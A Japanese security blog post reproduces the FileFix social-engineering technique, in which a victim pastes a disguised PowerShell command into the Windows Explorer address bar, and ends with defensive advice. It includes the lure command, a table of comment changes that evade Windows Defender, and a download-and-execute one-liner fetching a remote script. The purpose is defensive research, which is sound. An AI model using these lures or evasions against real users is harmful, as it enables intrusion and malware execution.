このブログは、株式会社ArmorisアルバイトのShaderoが書いています。
あるもりすぶろぐの内容は個人の意見です。
自分が管理する環境以外では絶対に試さないでください。 また、検証は自己責任で行ってください。 この情報を悪用することは絶対に行わないでください。
はじめに
今回は、ソーシャルエンジニアリング手法「ClickFix」の派生手法である「FileFix」について紹介します。
ClickFixについて
ClickFixとは、2024年4月中旬に発見・命名された新たなソーシャルエンジニアリングの手法です。ユーザに対して悪意のある操作手順を提示し、それに従わせる形でターミナル(PowerShellなど)や「ファイル名を指定して実行」を通じてコマンドを実行させ、システムへの侵入を試みる点が特徴です。
ユーザがコマンドをペースト&実行することで侵入するため、一見すると正規の手順と区別がつきにくく、従来のセキュリティ対策では検出や防止が非常に難しいとされています。
詳しい解説は、以下のブログ記事をご覧ください。
ClickFixとは? - 【令和7年度最新版】ソーシャルエンジニアリング - あるもりすぶろぐ
FileFixの概要
FileFixは、ClickFixの亜種として考案された新たな攻撃手法です。ClickFixは、ターミナル(PowerShellなど)や「ファイル名を指定して実行」機能を利用して、ユーザに悪意のあるコマンドを実行させますが、FileFixは、よりユーザに馴染みのあるエクスプローラーのアドレスバーを利用します。
実は、Windowsエクスプローラーのアドレスバーはコマンドの実行が可能です。これを悪用し、ブラウザのファイルアップロード機能等を組み合わせることで、自然に任意コマンドの実行へ誘導します。
検証
検証環境
| Name | Version |
|---|---|
| Windows 10 | 1909 |
| MicroSoft Edge | 138.0.3351.121 |
検証には、考案者であるmr.d0x氏のブログ記事に掲載されていたHTMLファイルを使用しました。
FileFix - A ClickFix Alternative | mr.d0x
なお、Windows Defenderのリアルタイム保護は無効化しています。 詳細は後述しますが、有効化した場合に一部コマンドの実行が防がれるためです。
検証
今回の検証では、攻撃者が「HRPolicy.docx」という名前のファイルを共有し、受け取ったユーザに以下の手順を促す形で誘導します。
- 表示されたファイルパスをコピー
- エクスプローラーを開き、アドレスバーを選択(Ctrl + L)
- コピーした内容を貼り付け、Enterを押す
今回の検証では、この指示に従うとPowerShellが開き、example.comにpingが飛ぶようになっています。
一見すると、社内文書の確認手順のように見えますが、実際に貼り付けられる内容は以下のようなPowerShellコマンドです。
Powershell.exe -c ping example.com # C:\company\internal-secure\filedrive\HRPolicy.docx
ファイルパスはコメントアウトされており、実際にはpingコマンドが実行される仕組みです。 さらに、アドレスバーでコマンド部分が目立たないよう、スペースが挿入されているため、ユーザが気付かずに実行してしまう危険があります。
今回の検証では pingコマンドを使用しましたが、実際には実行ユーザの権限の範囲内であれば、任意のコマンドを実行させることが可能です。 これによって、機密情報の窃取やマルウェアのダウンロード・実行、バックドアの設置といった、より深刻な攻撃へと発展するリスクがあります。 特に、管理者権限で操作しているユーザが標的となった場合、大きな被害を受ける可能性があります。
Windows Defenderを有効にした場合
Windows Defenderのリアルタイム保護を有効にして検証したところ、コマンドの実行がブロックされました。
元のコマンドからコメント部分を削除した場合は問題なく実行可能であったため、コマンド文字列に含まれるコメント部分が検出トリガーとなっている可能性があります。 そこで、コメント部分を様々な値に置き換えて再検証し、検出を回避できるかを確認しました。
| 名称 | 実行可否 | コメントの内容 |
|---|---|---|
| 適当な文字列 | ○ | hoge |
| ディレクトリパス | ○ | C:\company\internal-secure\filedrive\HRPolicy |
| ファイル名のみ(.docx) | × | HRPolicy.docx |
| ファイル名のみ(.txt) | ○ | HRPolicy.txt |
| ピリオドをカンマに置換 | ○ | C:\company\internal-secure\filedrive\HRPolicy,docx |
結果として、コメントの書き換えによってWindows Defenderの検知を回避できることが確認されました。
さらに、コマンド部分を変更し、外部からPowerShellスクリプトをダウンロードして実行するコードでも検証しました。
powershell.exe -NoExit -Command "Invoke-Expression (Invoke-WebRequest -Uri '(ps1ファイルのURL)').Content"
ダウンロード先のps1ファイルの内容は以下の通りです。
ping example.com
この場合もコメントを入れなければ正常に動作しました。しかし先ほどの検証とは異なり、表に記載したどのパターンのコメントを入れても、Windows Defenderによって実行がブロックされました。
検証結果まとめ
検証の結果、Windows Defenderのリアルタイム保護によって一部のコマンドはブロックされるものの、コメントやコマンド内容によっては回避できるケースがあることが分かりました。これは、現在の検出方式がパターンマッチング中心であることに起因しており、ルールの隙を突かれる可能性を常に意識する必要があります。
対策
FileFixのような攻撃に対しては、主に2つの対策が有効だと考えられます。
まず、Windows Defenderなどのセキュリティソフトを常に有効にしておくことが基本です。特にリアルタイム保護機能は、不審なコマンドやスクリプトの実行を阻止する有効な手段となります。今回の検証でも、Defenderが有効な状態では一部のコマンドがブロックされることを確認しました。 しかし、コードの内容によっては検出を回避できることも判明しました。そのため、Defenderに頼るだけでは検出ルールの抜け道を突かれるリスクが残ります。
次に重要なのが、ユーザ教育です。見慣れたファイル名や自然な操作手順であっても、「コピーして貼り付ける」といった指示には十分な注意が必要です。特にWebブラウザ上の案内をそのまま信じてしまうと、今回のような攻撃につながるリスクがあります。
このように、技術的な防御とユーザの意識向上の両面から備えることが、FileFixのような攻撃を防ぐ手段になると考えます。
おわりに
今回は、ソーシャルエンジニアリング手法「ClickFix」の派生手法である「FileFix」について紹介及び検証を行いました。
FileFixは、ユーザーにとって馴染み深いエクスプローラーのアドレスバーを悪用し、自然な操作に見せかけてコマンドを実行させる手法です。一見ただのファイルパスのように見えるため、ユーザーが疑うことなく実行してしまいやすいという点に大きなリスクがあります。
今回検証したClickFixの派生形であるFileFixのように、新たなソーシャルエンジニアリング手法は今後も登場する可能性があるため、引き続き、技術的対策とリテラシー向上の両面から備えていくことが求められます。
